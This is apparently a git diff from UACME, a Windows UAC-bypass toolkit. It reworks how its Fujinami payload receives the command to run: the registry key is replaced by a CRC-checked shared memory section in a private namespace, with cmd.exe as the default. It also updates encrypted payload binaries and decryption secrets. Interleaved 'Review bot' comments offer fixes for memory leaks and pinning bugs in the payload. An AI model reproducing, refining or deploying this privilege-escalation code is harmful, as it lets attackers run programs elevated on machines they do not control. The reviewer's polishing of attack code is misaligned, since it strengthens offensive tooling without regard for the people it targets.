diff --git a/Source/Akagi/bin/Akatsuki64.cd b/Source/Akagi/bin/Akatsuki64.cd
index b2327b9..57e70a6 100644
Binary files a/Source/Akagi/bin/Akatsuki64.cd and b/Source/Akagi/bin/Akatsuki64.cd differ
diff --git a/Source/Akagi/bin/Chiyoda64.cd b/Source/Akagi/bin/Chiyoda64.cd
index c1ff0d7..8103f7d 100644
Binary files a/Source/Akagi/bin/Chiyoda64.cd and b/Source/Akagi/bin/Chiyoda64.cd differ
diff --git a/Source/Akagi/bin/Fujinami.cd b/Source/Akagi/bin/Fujinami.cd
index 7f4a8cc..f913472 100644
Binary files a/Source/Akagi/bin/Fujinami.cd and b/Source/Akagi/bin/Fujinami.cd differ
diff --git a/Source/Akagi/bin/Ikazuchi32.cd b/Source/Akagi/bin/Ikazuchi32.cd
index 8b09fa2..4751bf5 100644
Binary files a/Source/Akagi/bin/Ikazuchi32.cd and b/Source/Akagi/bin/Ikazuchi32.cd differ
diff --git a/Source/Akagi/bin/Ikazuchi64.cd b/Source/Akagi/bin/Ikazuchi64.cd
index 6c4fad8..4d826ae 100644
Binary files a/Source/Akagi/bin/Ikazuchi64.cd and b/Source/Akagi/bin/Ikazuchi64.cd differ
diff --git a/Source/Akagi/bin/Kamikaze.cd b/Source/Akagi/bin/Kamikaze.cd
index 766678a..cb8b678 100644
Binary files a/Source/Akagi/bin/Kamikaze.cd and b/Source/Akagi/bin/Kamikaze.cd differ
diff --git a/Source/Akagi/bin/fubuki32.cd b/Source/Akagi/bin/fubuki32.cd
index f67c8b3..1b9bff8 100644
Binary files a/Source/Akagi/bin/fubuki32.cd and b/Source/Akagi/bin/fubuki32.cd differ
diff --git a/Source/Akagi/bin/fubuki64.cd b/Source/Akagi/bin/fubuki64.cd
index a728caa..3905627 100644
Binary files a/Source/Akagi/bin/fubuki64.cd and b/Source/Akagi/bin/fubuki64.cd differ
diff --git a/Source/Akagi/bin/hibiki32.cd b/Source/Akagi/bin/hibiki32.cd
index def39b8..0834a57 100644
Binary files a/Source/Akagi/bin/hibiki32.cd and b/Source/Akagi/bin/hibiki32.cd differ
diff --git a/Source/Akagi/bin/hibiki64.cd b/Source/Akagi/bin/hibiki64.cd
index b84cb31..1dc094e 100644
Binary files a/Source/Akagi/bin/hibiki64.cd and b/Source/Akagi/bin/hibiki64.cd differ
diff --git a/Source/Akagi/bin/kongou32.cd b/Source/Akagi/bin/kongou32.cd
index 7e191a5..726f491 100644
Binary files a/Source/Akagi/bin/kongou32.cd and b/Source/Akagi/bin/kongou32.cd differ
diff --git a/Source/Akagi/bin/kongou64.cd b/Source/Akagi/bin/kongou64.cd
index 53c654b..cab4a75 100644
Binary files a/Source/Akagi/bin/kongou64.cd and b/Source/Akagi/bin/kongou64.cd differ
diff --git a/Source/Akagi/methods/methods.c b/Source/Akagi/methods/methods.c
index 9548b77..c25124a 100644
--- a/Source/Akagi/methods/methods.c
+++ b/Source/Akagi/methods/methods.c
@@ -6,7 +6,7 @@
*
* VERSION: 3.10
*
-* DATE: 11 Nov 2018
+* DATE: 13 Nov 2018
*
* UAC bypass dispatch.
*
@@ -384,21 +384,7 @@ BOOL MethodsManagerCall(
// 2. Optional parameter from Akagi command line.
//
if (Entry->SetParameters) {
- //
- // Special case for dotnet unit.
- // Reimplementation pending.
- //
- if (Entry->PayloadResourceId == FUJINAMI_ID) {
- if (g_ctx.OptionalParameterLength != 0) {
- supSetParameter(
- (LPWSTR)&g_ctx.szOptionalParameter,
- (DWORD)(g_ctx.OptionalParameterLength * sizeof(WCHAR))
- );
- }
- }
- else {
- bParametersBlockSet = supCreateSharedParametersBlock();
- }
+ bParametersBlockSet = supCreateSharedParametersBlock();
}
bResult = (BOOL)Entry->Routine(&ParamsBlock);
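Review bot: The value returned by supCreateSharedParametersBlock() is stored in bParametersBlockSet but never consulted before Entry->Routine(&ParamsBlock) is dispatched on the following line, so a failed block creation still runs the method with whatever state the payload happens to find. If that is deliberate (the payload side in this same commit appears to fall back to its defaults when no parameters are read), a short comment on the assignment would save the next reader the question, e.g. `// A failed block is tolerated here: the payload uses its defaults when no parameters are present.`; if it is not deliberate, the call should fail instead of dispatching. The rest of MethodsManagerCall, including any later use of bParametersBlockSet for cleanup, lies outside this hunk.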
diff --git a/Source/Akagi/secrets.h b/Source/Akagi/secrets.h
index abab080..d08c5ea 100644
--- a/Source/Akagi/secrets.h
+++ b/Source/Akagi/secrets.h
@@ -6,7 +6,7 @@
*
* VERSION: 3.10
*
-* DATE: 11 Nov 2018
+* DATE: 13 Nov 2018
*
* Secrets used for decryption.
*
@@ -40,9 +40,9 @@ static const unsigned char g_bSecrets[288] = {
0x46, 0x30, 0xB9, 0x80, 0x26, 0x6C, 0x0E, 0x18, 0xE4, 0xF3, 0x97, 0x1B, 0x9C, 0xCE, 0x9F, 0x3F,
0x09, 0xC2, 0x85, 0x0B, 0xE0, 0x4F, 0xDA, 0x57, 0xF7, 0xF7, 0xBB, 0x8F, 0x0E, 0x53, 0xF4, 0xD8,
0xF8, 0x1A, 0x4F, 0xFF, 0x24, 0xDA, 0xFF, 0x66, 0xA2, 0x18, 0x5D, 0xBC, 0xA8, 0xBE, 0x28, 0x6D,
- 0x6E, 0x7F, 0x9A, 0x2E, 0x7F, 0x2D, 0x5A, 0xB5, 0x2C, 0x25, 0xEE, 0xEA, 0xC2, 0xA6, 0xBA, 0x80,
- 0xC2, 0x73, 0xC8, 0xB6, 0x39, 0xFD, 0x9A, 0xF1, 0x6F, 0x77, 0x24, 0x42, 0x34, 0xE2, 0xF9, 0x6B,
- 0xC8, 0xEA, 0x3A, 0xAC, 0x7F, 0x0C, 0x47, 0xC5, 0x01, 0xD6, 0xAD, 0x5B, 0x25, 0x28, 0x53, 0xC6,
+ 0x6E, 0x7F, 0x9A, 0x2E, 0x7F, 0x2D, 0x5A, 0xB5, 0x45, 0x60, 0x51, 0xD6, 0x3F, 0x7B, 0x15, 0xC2,
+ 0x77, 0x8D, 0x29, 0xDC, 0xDE, 0xE1, 0xED, 0x7B, 0x78, 0xC8, 0xEE, 0x7C, 0x49, 0x69, 0xB7, 0xAF,
+ 0xF9, 0x05, 0x78, 0x47, 0x01, 0x63, 0x77, 0x13, 0x01, 0xD6, 0xAD, 0x5B, 0x25, 0x28, 0x53, 0xC6,
0x68, 0xE0, 0x78, 0xBA, 0xA4, 0x5B, 0x0C, 0x93, 0x10, 0xC9, 0xF7, 0xDB, 0x65, 0x03, 0x20, 0xB0,
0x24, 0x43, 0xA1, 0x1D, 0x19, 0x9B, 0x13, 0x81, 0x19, 0x3F, 0xDE, 0x19, 0x48, 0x93, 0x27, 0x4F,
0xF1, 0xC9, 0xDF, 0x0F, 0x30, 0x4C, 0xDF, 0x75, 0xAB, 0xEA, 0x72, 0x51, 0x2C, 0x56, 0x42, 0x3C,
@@ -57,8 +57,8 @@ static const unsigned char g_bSecrets[180] = {
0x20, 0x06, 0x6F, 0x70, 0xD2, 0xBD, 0x76, 0x74, 0xA4, 0xDC, 0xB9, 0x73, 0x08, 0x93, 0xEE, 0x05,
0x31, 0xAF, 0xE1, 0x5F, 0x01, 0x42, 0x89, 0x10, 0xDD, 0x79, 0x8E, 0xE6, 0x2E, 0x82, 0x02, 0xDB,
0x2E, 0xB2, 0x99, 0x81, 0x1B, 0xA8, 0x15, 0xD5, 0x53, 0xFD, 0xC9, 0x92, 0x2A, 0xCC, 0x98, 0x30,
- 0x26, 0x31, 0xC6, 0xBA, 0x62, 0xE7, 0x38, 0x85, 0xC8, 0x67, 0xE0, 0xE6, 0x99, 0xBC, 0x19, 0xF6,
- 0x60, 0x69, 0x18, 0x3A, 0xC4, 0x03, 0x3A, 0xEC, 0xC7, 0xF4, 0x06, 0xD4, 0x8F, 0xED, 0x85, 0x40,
+ 0x4F, 0x74, 0x79, 0x86, 0x9F, 0x3A, 0x97, 0xC7, 0x7D, 0x99, 0x01, 0x8C, 0x7E, 0xA0, 0x6E, 0x7C,
+ 0x77, 0xD6, 0xD2, 0x04, 0xB9, 0x88, 0x74, 0x28, 0xF6, 0x1B, 0x44, 0x3F, 0xF1, 0x82, 0xB5, 0x96,
0x9F, 0x3D, 0x7A, 0xF4, 0x5D, 0x82, 0xDA, 0x88, 0x0C, 0x79, 0x48, 0xD3, 0x51, 0x7B, 0x39, 0x77,
0x76, 0x3A, 0xF8, 0xBD, 0xA9, 0xC5, 0x11, 0xBF, 0xC7, 0x86, 0xDD, 0xA2, 0x49, 0xE9, 0x28, 0x1C,
0xF6, 0x97, 0x26, 0x75
diff --git a/Source/Akagi/sup.c b/Source/Akagi/sup.c
index 9849b22..08943e7 100644
--- a/Source/Akagi/sup.c
+++ b/Source/Akagi/sup.c
@@ -6,7 +6,7 @@
*
* VERSION: 3.10
*
-* DATE: 11 Nov 2018
+* DATE: 13 Nov 2018
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@@ -1026,42 +1026,6 @@ LPWSTR supQueryEnvironmentVariableOffset(
return (ptr + Value->Length / sizeof(WCHAR));
}
-/*
-* supSetParameter
-*
-* Purpose:
-*
-* Set parameter for payload execution.
-*
-*/
-BOOL supSetParameter(
- _In_ LPWSTR lpParameter,
- _In_ DWORD cbParameter
-)
-{
- BOOL bResult = FALSE;
- HKEY hKey = NULL;
- LRESULT lRet;
-
- lRet = RegCreateKeyEx(HKEY_CURRENT_USER, T_AKAGI_KEY, 0, NULL,
- REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
-
- if ((lRet == ERROR_SUCCESS) && (hKey != NULL)) {
-
- //
- // Write optional parameter.
- //
- lRet = RegSetValueEx(hKey, T_AKAGI_PARAM, 0, REG_SZ,
- (LPBYTE)lpParameter, cbParameter);
-
- bResult = (lRet == ERROR_SUCCESS);
-
- RegCloseKey(hKey);
- }
-
- return bResult;
-}
-
/*
* supChkSum
*
diff --git a/Source/Akagi/sup.h b/Source/Akagi/sup.h
index 63f9b89..6593410 100644
--- a/Source/Akagi/sup.h
+++ b/Source/Akagi/sup.h
@@ -6,7 +6,7 @@
*
* VERSION: 3.10
*
-* DATE: 11 Nov 2018
+* DATE: 13 Nov 2018
*
* Common header file for the program support routines.
*
@@ -132,10 +132,6 @@ DWORD supQueryEntryPointRVA(
LPWSTR supQueryEnvironmentVariableOffset(
_In_ PUNICODE_STRING Value);
-BOOL supSetParameter(
- _In_ LPWSTR lpParameter,
- _In_ DWORD cbParameter);
-
DWORD supCalculateCheckSumForMappedFile(
_In_ PVOID BaseAddress,
_In_ ULONG FileLength);
diff --git a/Source/Akagi/uacme.vcxproj.user b/Source/Akagi/uacme.vcxproj.user
index 05af7d1..12378a5 100644
--- a/Source/Akagi/uacme.vcxproj.user
+++ b/Source/Akagi/uacme.vcxproj.user
@@ -23,7 +23,7 @@
WindowsLocalDebugger
- 52
+ 0
WindowsLocalDebugger
\ No newline at end of file
diff --git a/Source/Fujinami/EntryPoint.cs b/Source/Fujinami/EntryPoint.cs
index b123cfa..e8403c6 100644
--- a/Source/Fujinami/EntryPoint.cs
+++ b/Source/Fujinami/EntryPoint.cs
@@ -1,51 +1,170 @@
-using System;
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2018
+*
+* TITLE: FUJINAMI.CS
+*
+* VERSION: 3.10
+*
+* DATE: 13 Nov 2018
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+using System;
using System.Diagnostics;
-using Microsoft.Win32;
+using System.Runtime.InteropServices;
//
// Fujinami payload code
//
-// Simplified version of old Fubuki version.
// Read registry value with custom parameter and execute it.
//
namespace Fujinami
{
public class EntryPoint
{
+ ///
+ /// Program entry point.
+ ///
static EntryPoint()
{
- Debug.Write("Ready, fire!");
-
- string CustomParam = string.Empty;
-
try
{
- RegistryKey Key = Registry.CurrentUser.OpenSubKey("Software\\Akagi", false);
- CustomParam = Key.GetValue("LoveLetter").ToString();
- Key.Close();
+ Debug.Write("Ready, fire!");
- } catch {
- //
- // Suppress any errors.
- //
- CustomParam = null;
- }
+ bool bSharedParamsReadOk = false;
+ IntPtr BoundaryDescriptor = NativeMethods.CreateBoundaryDescriptorW("ArisuTsuberuku", 0);
+ if (BoundaryDescriptor == IntPtr.Zero)
+ return;
- if (CustomParam == null)
- CustomParam = "cmd.exe";
+ IntPtr domainSid = IntPtr.Zero;
+ IntPtr pSid = IntPtr.Zero;
+ uint cbSid = 0;
- try
- {
- Process.Start(CustomParam);
+ NativeMethods.CreateWellKnownSid(NativeMethods.WELL_KNOWN_SID_TYPE.WinWorldSid, domainSid, pSid, ref cbSid);
+
+ pSid = Marshal.AllocHGlobal(Convert.ToInt32(cbSid));
+
+ if (!NativeMethods.CreateWellKnownSid(
+ NativeMethods.WELL_KNOWN_SID_TYPE.WinWorldSid,
+ domainSid,
+ pSid,
+ ref cbSid))
+ {
+ return;
+ }
+
+ if (!NativeMethods.AddSIDToBoundaryDescriptor(ref BoundaryDescriptor, pSid))
+ return;
+
+ IntPtr hPrivateNamespace = NativeMethods.OpenPrivateNamespaceW(BoundaryDescriptor, "AkagiIsoSpace");
+
+ Marshal.FreeHGlobal(pSid);
+ NativeMethods.DeleteBoundaryDescriptor(BoundaryDescriptor);
+
+ if (hPrivateNamespace == IntPtr.Zero)
+ return;
+
+ IntPtr hSection = IntPtr.Zero;
+
+ NativeMethods.OBJECT_ATTRIBUTES oa = new NativeMethods.OBJECT_ATTRIBUTES(
+ "AkagiSharedSection",
+ NativeMethods.ObjectFlags.CaseInsensitive,
+ hPrivateNamespace);
+
+ NativeMethods.NtStatus Status = NativeMethods.NtOpenSection(
+ out hSection,
+ NativeMethods.SectionAccess.MapRead,
+ ref oa);
+
+ if (NativeMethods.IsSuccess(Status))
+ {
+ IntPtr BaseAddress = IntPtr.Zero;
+ IntPtr ViewSize = new IntPtr(0x1000);
+ long sectionOffset = 0;
+
+ Status = NativeMethods.NtMapViewOfSection(
+ hSection,
+ NativeMethods.GetCurrentProcess(),
+ ref BaseAddress,
+ IntPtr.Zero,
+ new IntPtr(0x1000),
+ ref sectionOffset,
+ ref ViewSize,
+ NativeMethods.SectionInherit.ViewUnmap,
+ NativeMethods.MemoryFlags.TopDown,
+ NativeMethods.MemoryProtection.ReadOnly);
+
+ if (NativeMethods.IsSuccess(Status))
+ {
+ Int32 StructSize = Marshal.SizeOf(typeof(NativeMethods.SHARED_PARAMS));
+ byte[] rawData = new byte[StructSize];
+ Marshal.Copy(BaseAddress, rawData, 0, StructSize);
+
+ NativeMethods.SHARED_PARAMS SharedParams = (NativeMethods.SHARED_PARAMS)
+ Marshal.PtrToStructure(
+ Marshal.UnsafeAddrOfPinnedArrayElement(rawData, 0),
+ typeof(NativeMethods.SHARED_PARAMS));
+
+ NativeMethods.NtUnmapViewOfSection(hSection, BaseAddress);
+
+ var Crc32 = SharedParams.Crc32;
+ SharedParams.Crc32 = 0;
+
+ var StructPtr = Marshal.AllocHGlobal(StructSize);
+
+ Marshal.StructureToPtr(SharedParams, StructPtr, false);
+
+ bSharedParamsReadOk = (Crc32 == NativeMethods.RtlComputeCrc32(0, StructPtr, Convert.ToUInt32(StructSize)));
+
+ Marshal.FreeHGlobal(StructPtr);
+
+ var PayloadToExecute = string.Empty;
+
+ if (bSharedParamsReadOk)
+ {
+ PayloadToExecute = SharedParams.szParameter;
+ }
+
+ if (PayloadToExecute == string.Empty)
+ PayloadToExecute = "cmd.exe";
+
+ Process.Start(PayloadToExecute);
+
+ if (bSharedParamsReadOk)
+ {
+ IntPtr hEvent = IntPtr.Zero;
+
+ NativeMethods.OBJECT_ATTRIBUTES oae = new NativeMethods.OBJECT_ATTRIBUTES(
+ SharedParams.szSignalObject,
+ NativeMethods.ObjectFlags.CaseInsensitive,
+ hPrivateNamespace);
+
+ Status = NativeMethods.NtOpenEvent(out hEvent, NativeMethods.EventAccess.AllAccess, ref oae);
+ if (NativeMethods.IsSuccess(Status))
+ {
+ int prev = 0;
+ NativeMethods.NtSetEvent(hEvent, out prev);
+ NativeMethods.NtClose(hEvent);
+ }
+ }
+ }
+ NativeMethods.NtClose(hSection);
+ }
+ NativeMethods.ClosePrivateNamespace(hPrivateNamespace, 0);
}
catch
{
- //
- // Suppress any errors.
- //
Environment.Exit(0);
}
+ Debug.Write("Bye!");
+
Environment.Exit(0);
}
}
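Review bot: In the NtMapViewOfSection success branch, `Marshal.UnsafeAddrOfPinnedArrayElement(rawData, 0)` is applied to a managed byte[] that was never pinned, so the address it returns can go stale if the GC moves the array before PtrToStructure reads through it; the intermediate copy is also unnecessary because the view is still mapped at that point, so reading straight from the view — `NativeMethods.SHARED_PARAMS SharedParams = (NativeMethods.SHARED_PARAMS)Marshal.PtrToStructure(BaseAddress, typeof(NativeMethods.SHARED_PARAMS));` — and then unmapping removes both the copy and the pinning hazard. Separately, the early `return` statements after the second CreateWellKnownSid and after AddSIDToBoundaryDescriptor leave pSid and BoundaryDescriptor unreleased, and the IDisposable OBJECT_ATTRIBUTES values oa and oae are never disposed, so their unmanaged name buffers leak; a try/finally around the SID/descriptor setup and a `using` around each OBJECT_ATTRIBUTES would close that. The `///` comment above the member is not well-formed XML documentation and the member is a static constructor (type initializer), not Main; `/// <summary>Type initializer: runs the payload logic once when the type is first touched.</summary>` describes it accurately.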
diff --git a/Source/Fujinami/Fujinami.csproj b/Source/Fujinami/Fujinami.csproj
index 140c434..7837dbd 100644
--- a/Source/Fujinami/Fujinami.csproj
+++ b/Source/Fujinami/Fujinami.csproj
@@ -42,6 +42,18 @@
+
+ True
+ True
+ Resources.resx
+
+
+
+
+
+ ResXFileCodeGenerator
+ Resources.Designer.cs
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ text/microsoft-resx
+
+
+ 1.3
+
+
+ System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.3500.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
+
+
+ System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.3500.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
+
+
\ No newline at end of file
diff --git a/Source/Fujinami/WinNT.cs b/Source/Fujinami/WinNT.cs
new file mode 100644
index 0000000..389b295
--- /dev/null
+++ b/Source/Fujinami/WinNT.cs
@@ -0,0 +1,319 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2018
+*
+* TITLE: NATIVEMETHODS.CS
+*
+* VERSION: 1.0.1.0
+*
+* DATE: 11 Nov 2018
+*
+* Unmanaged API definitions and prototypes.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+using System;
+using System.Runtime.InteropServices;
+
+namespace Fujinami
+{
+ public static class NativeMethods
+ {
+ [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
+ public struct SHARED_PARAMS
+ {
+ public UInt32 Crc32;
+ public UInt32 SessionId;
+ public UInt32 AkagiFlag;
+ [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 261)]
+ public string szParameter;
+ [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 261)]
+ public string szDesktop;
+ [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 261)]
+ public string szWinstation;
+ [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 261)]
+ public string szSignalObject;
+ }
+
+ public enum WELL_KNOWN_SID_TYPE
+ {
+ WinWorldSid = 1
+ }
+
+ public const Int32 SECURITY_MAX_SID_SIZE = 68;
+
+ public enum NtStatus : UInt32
+ {
+ Success = 0x00000000,
+ Informational = 0x40000000,
+ Warning = 0x80000000,
+ Error = 0xc0000000,
+ MaximumNtStatus = 0xffffffff
+ }
+
+ public static bool IsSuccess(NtStatus status) => status >= NtStatus.Success && status < NtStatus.Informational;
+
+ [DllImport("kernel32.dll", SetLastError = true)]
+ public static extern IntPtr GetCurrentProcess();
+
+ [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
+ public static extern IntPtr OpenPrivateNamespaceW(
+ [In] IntPtr lpBoundaryDescriptor,
+ [In] [MarshalAs(UnmanagedType.LPWStr)] string lpAliasPrefix);
+
+ [DllImport("kernel32.dll", SetLastError = true)]
+ public static extern bool ClosePrivateNamespace(
+ [In] IntPtr Handle,
+ [In] UInt32 Flags);
+
+ [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
+ public static extern IntPtr CreateBoundaryDescriptorW(
+ [In] [MarshalAs(UnmanagedType.LPWStr)] string Name,
+ [In] UInt32 Flags);
+
+ [DllImport("kernel32.dll", SetLastError = true)]
+ public static extern void DeleteBoundaryDescriptor(
+ [In] IntPtr BoundaryDescriptor);
+
+ [DllImport("advapi32.dll", SetLastError = true)]
+ public static extern bool CreateWellKnownSid(
+ [In] WELL_KNOWN_SID_TYPE WellKnownSidType,
+ [In] IntPtr DomainSid,
+ [In] IntPtr pSid,
+ ref UInt32 cbSid);
+
+ [DllImport("kernel32.dll", SetLastError = true)]
+ public static extern bool AddSIDToBoundaryDescriptor(
+ ref IntPtr BoundaryDescriptor,
+ [In] IntPtr RequiredSid);
+
+ [Flags]
+ public enum ObjectFlags : UInt32
+ {
+ Inherit = 0x2,
+ Permanent = 0x10,
+ Exclusive = 0x20,
+ CaseInsensitive = 0x40,
+ OpenIf = 0x80,
+ OpenLink = 0x100,
+ KernelHandle = 0x200,
+ ForceAccessCheck = 0x400,
+ ValidAttributes = 0x7f2
+ }
+
+ [StructLayout(LayoutKind.Sequential)]
+ public struct UNICODE_STRING : IDisposable
+ {
+ public ushort Length;
+ public ushort MaximumLength;
+ private IntPtr buffer;
+
+ public UNICODE_STRING(string s)
+ {
+ Length = (ushort)(s.Length * 2);
+ MaximumLength = (ushort)(Length + 2);
+ buffer = Marshal.StringToHGlobalUni(s);
+ }
+
+ public void Dispose()
+ {
+ Marshal.FreeHGlobal(buffer);
+ buffer = IntPtr.Zero;
+ }
+
+ public override string ToString()
+ {
+ return Marshal.PtrToStringUni(buffer);
+ }
+ }
+
+ [StructLayout(LayoutKind.Sequential)]
+ public struct OBJECT_ATTRIBUTES : IDisposable
+ {
+ public int Length;
+ public IntPtr RootDirectory;
+ private IntPtr objectName;
+ public ObjectFlags Attributes;
+ private IntPtr SecurityDescriptor;
+ private IntPtr SecurityQualityOfService;
+
+ public OBJECT_ATTRIBUTES(string name, ObjectFlags attrs, IntPtr root)
+ {
+ Length = 0;
+ RootDirectory = root;
+ objectName = IntPtr.Zero;
+ Attributes = attrs;
+ SecurityDescriptor = IntPtr.Zero;
+ SecurityQualityOfService = IntPtr.Zero;
+
+ Length = Marshal.SizeOf(this);
+ ObjectName = new UNICODE_STRING(name);
+ }
+
+ public UNICODE_STRING ObjectName
+ {
+ get
+ {
+ return (UNICODE_STRING)Marshal.PtrToStructure(
+ objectName, typeof(UNICODE_STRING));
+ }
+
+ set
+ {
+ bool fDeleteOld = objectName != IntPtr.Zero;
+ if (!fDeleteOld)
+ objectName = Marshal.AllocHGlobal(Marshal.SizeOf(value));
+ Marshal.StructureToPtr(value, objectName, fDeleteOld);
+ }
+ }
+
+ public void Dispose()
+ {
+ if (objectName != IntPtr.Zero)
+ {
+ Marshal.DestroyStructure(objectName, typeof(UNICODE_STRING));
+ Marshal.FreeHGlobal(objectName);
+ objectName = IntPtr.Zero;
+ }
+ }
+ }
+
+ [Flags]
+ public enum StandardRights : UInt32
+ {
+ Delete = 0x00010000,
+ ReadControl = 0x00020000,
+ WriteDac = 0x00040000,
+ WriteOwner = 0x00080000,
+ Synchronize = 0x00100000,
+ Required = 0x000f0000,
+ Read = ReadControl,
+ Write = ReadControl,
+ Execute = ReadControl,
+ All = 0x001f0000,
+
+ SpecificRightsAll = 0x0000ffff,
+ AccessSystemSecurity = 0x01000000,
+ MaximumAllowed = 0x02000000,
+ GenericRead = 0x80000000,
+ GenericWrite = 0x40000000,
+ GenericExecute = 0x20000000,
+ GenericAll = 0x10000000
+ }
+
+ [Flags]
+ public enum SectionAccess : UInt32
+ {
+ Query = 0x0001,
+ MapWrite = 0x0002,
+ MapRead = 0x0004,
+ MapExecute = 0x0008,
+ ExtendSize = 0x0010,
+ MapExecuteExplicit = 0x0020,
+ AllAccess = StandardRights.Required | Query | MapWrite | MapRead | MapExecute | ExtendSize
+ }
+
+ public enum SectionInherit : Int32
+ {
+ ViewShare = 1,
+ ViewUnmap = 2
+ }
+
+ [Flags]
+ public enum MemoryFlags : UInt32
+ {
+ Commit = 0x1000,
+ Reserve = 0x2000,
+ Decommit = 0x4000,
+ Release = 0x8000,
+ Free = 0x10000,
+ Private = 0x20000,
+ Mapped = 0x40000,
+ Reset = 0x80000,
+ TopDown = 0x100000,
+ WriteWatch = 0x200000,
+ Physical = 0x400000,
+ LargePages = 0x20000000,
+ DosLimit = 0x40000000,
+ FourMbPages = 0x80000000
+ }
+
+ [Flags]
+ public enum MemoryProtection : UInt32
+ {
+ AccessDenied = 0x0,
+ Execute = 0x10,
+ ExecuteRead = 0x20,
+ ExecuteReadWrite = 0x40,
+ ExecuteWriteCopy = 0x80,
+ Guard = 0x100,
+ NoCache = 0x200,
+ WriteCombine = 0x400,
+ NoAccess = 0x01,
+ ReadOnly = 0x02,
+ ReadWrite = 0x04,
+ WriteCopy = 0x08
+ }
+
+ [Flags]
+ public enum EventAccess : UInt32
+ {
+ QueryState = 0x1,
+ ModifyState = 0x2,
+ AllAccess = StandardRights.Required | StandardRights.Synchronize |
+ QueryState | ModifyState
+ }
+
+
+ [DllImport("ntdll.dll")]
+ public static extern NtStatus NtClose(
+ [In] IntPtr hObject);
+
+ [DllImport("ntdll.dll")]
+ public static extern NtStatus NtOpenSection(
+ [Out] out IntPtr SectionHandle,
+ [In] SectionAccess DesiredAccess,
+ [In] ref OBJECT_ATTRIBUTES ObjectAttributes);
+
+ [DllImport("ntdll.dll")]
+ public static extern NtStatus NtMapViewOfSection(
+ [In] IntPtr SectionHandle,
+ [In] IntPtr ProcessHandle,
+ ref IntPtr BaseAddress,
+ [In] IntPtr ZeroBits,
+ [In] IntPtr CommitSize,
+ [Optional] ref long SectionOffset,
+ ref IntPtr ViewSize,
+ [In] SectionInherit InheritDisposition,
+ [In] MemoryFlags AllocationType,
+ [In] MemoryProtection Win32Protect);
+
+ [DllImport("ntdll.dll")]
+ public static extern NtStatus NtUnmapViewOfSection(
+ [In] IntPtr ProcessHandle,
+ [In] IntPtr BaseAddress);
+
+ [DllImport("ntdll.dll")]
+ public static extern UInt32 RtlComputeCrc32(
+ [In] UInt32 PartialCrc,
+ [In] IntPtr Buffer,
+ [In] UInt32 Length);
+
+ [DllImport("ntdll.dll")]
+ public static extern NtStatus NtOpenEvent(
+ [Out] out IntPtr EventHandle,
+ [In] EventAccess DesiredAccess,
+ [In] ref OBJECT_ATTRIBUTES ObjectAttributes);
+
+ [DllImport("ntdll.dll")]
+ public static extern NtStatus NtSetEvent(
+ [In] IntPtr EventHandle,
+ [Out] [Optional] out int PreviousState);
+
+ }
+}
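Review bot: OBJECT_ATTRIBUTES.Dispose frees the block that holds the marshaled UNICODE_STRING but never releases the string buffer that UNICODE_STRING's constructor allocated with StringToHGlobalUni, because UNICODE_STRING.Dispose is never invoked and Marshal.DestroyStructure does not free a plain IntPtr field; the same buffer would leak in the ObjectName setter if a name were ever reassigned over an existing one. Reading the embedded struct back and disposing it first fixes Dispose: add `ObjectName.Dispose();` immediately before `Marshal.FreeHGlobal(objectName);`. The file header says TITLE: NATIVEMETHODS.CS while the file is WinNT.cs, and SECURITY_MAX_SID_SIZE is declared but not used in this file; aligning the title and either using or dropping the constant keeps the header honest. IsSuccess accepts only statuses below Informational, which is stricter than the usual NT_SUCCESS test that also admits informational codes — if that narrowing is intentional, a one-line comment on the method saying so would prevent it being "fixed" later.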
diff --git a/Source/Shared/consts.h b/Source/Shared/consts.h
index 32ea587..7dd7a8a 100644
--- a/Source/Shared/consts.h
+++ b/Source/Shared/consts.h
@@ -6,7 +6,7 @@
*
* VERSION: 3.10
*
-* DATE: 11 Nov 2018
+* DATE: 13 Nov 2018
*
* Global consts definition file.
*
@@ -224,11 +224,6 @@
#define WOW64STRING L"Wow64 detected, use x64 version of this tool."
#define WOW64WIN32ONLY L"This method only works with x86-32 Windows or from Wow64"
#define UACFIX L"This method fixed/unavailable in the current version of Windows, do you still want to continue?"
-#define T_AKAGI_KEY L"Software\\Akagi"
-#define T_AKAGI_PARAM L"LoveLetter"
-#define T_AKAGI_FLAG L"Flag"
-#define T_AKAGI_SESSION L"SessionId"
-#define T_AKAGI_DESKTOP L"Desktop"
#define T_VOLATILE_ENV L"Volatile Environment"
#define T_SYSTEMROOT_VAR L"SYSTEMROOT"
#define T_REGISTRY_PREP L"\\REGISTRY\\" //end slash included
diff --git a/UACME.sha256 b/UACME.sha256
index 6f9825c..9f3408a 100644
--- a/UACME.sha256
+++ b/UACME.sha256
@@ -17,25 +17,25 @@ bd7f1ebd11ed2313bef81c4701b2444ab37d9723493bfeb9de5db2063a5213e2 *Source\Akagi\m
